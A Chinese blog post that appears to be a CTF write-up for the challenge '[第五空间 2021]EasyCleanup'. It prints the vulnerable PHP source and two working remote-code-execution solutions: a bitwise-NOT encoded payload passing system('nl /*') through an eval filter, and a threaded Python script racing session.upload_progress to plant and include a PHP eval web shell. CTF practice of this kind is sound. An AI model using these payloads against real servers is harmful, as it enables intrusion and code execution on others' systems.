热门标签
热门文章
- 1Docker 容器镜像删除_kali删除images
- 2求职面试 - Spring 面试知识点_spring面试知识点
- 3平衡小车——陀螺仪_平衡车陀螺仪芯片
- 4Linux设置网关_linux 配置网关
- 5java万年历uml_Java Calendar,Date,DateFormat,TimeZone,Locale等时间相关内容的认知和使用(2) 自己封装的Calendar接口...
- 6运维效率提升:基于大模型构建高效的运维知识及智能问答平台_智能运维大模型
- 7Java连接数据库中的MysqlUtil.java增删改查详解_java mysqlutil
- 8一款强大的mac系统清理工具CleanMyMac X 4.15.3 中文破解版_cleanmymac x for mac
- 9动态规划算法学习四:最大上升子序列问题(LIS:Longest Increasing Subsequence)
- 10贪心系列专题篇四
当前位置: article > 正文
[第五空间 2021]EasyCleanup
作者:运维做开发 | 2024-08-19 07:55:32
赞
踩
[第五空间 2021]EasyCleanup
题目源代码:
<?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GET['mode'] == "eval"){ $shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();'; if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); eval($shell); } if(isset($_GET['file'])){ if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); include $_GET['file']; } function filter($var){ $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; foreach($banned as $ban){ if(strstr($var, $ban)) return True; } return False; } function checkNums($var){ $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $cnt = 0; for($i = 0; $i < strlen($alphanum); $i++){ for($j = 0; $j < strlen($var); $j++){ if($var[$j] == $alphanum[$i]){ $cnt += 1; if($cnt > 8) return True; } } } return False; } ?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
解题方法一:
exp:
<?php
$s='nl /*';
echo '~'.urlencode(~$s);
- 1
- 2
- 3
http://node4.anna.nssctf.cn:28488/?mode=eval&shell=system(~%91%93%DF%D0%D5);
解题方法二:
【文件包含&条件竞争】利用session.upload_progress文件包含进行RCE
使用条件
- 目标环境开启了
session.upload_progress.enable选项 - 发送一个文件上传请求,其中包含一个文件表单和一个名字是
PHP_SESSION_UPLOAD_PROGRESS的字段 - 请求的Cookie中包含Session ID
注意的是,如果我们只上传一个文件,这里也是不会遗留下Session文件的,所以表单里必须有两个以上的文件上传。
import io import threading import requests url = "http://node4.anna.nssctf.cn:28873/" sess_id = "1" file_name = '1.txt' file_data = io.BytesIO(b'a' * 1024 * 50) def write(session): while True: session.post(url, data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'}, cookies={'PHPSESSID': sess_id}, files={'file': (file_name, file_data)}) def read(session): while True: res = session.post(f"{url}?mode=foo&file=/tmp/sess_{sess_id}&cmd=system('nl /*');") if file_name in res.text: print(res.text) break else: print("Retry") if __name__ == "__main__": evnet = threading.Event() with requests.session() as session: for i in range(5): threading.Thread(target=write, args=(session,)).start() for i in range(5): threading.Thread(target=read, args=(session,)).start() evnet.set()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/运维做开发/article/detail/1001368
推荐阅读
相关标签
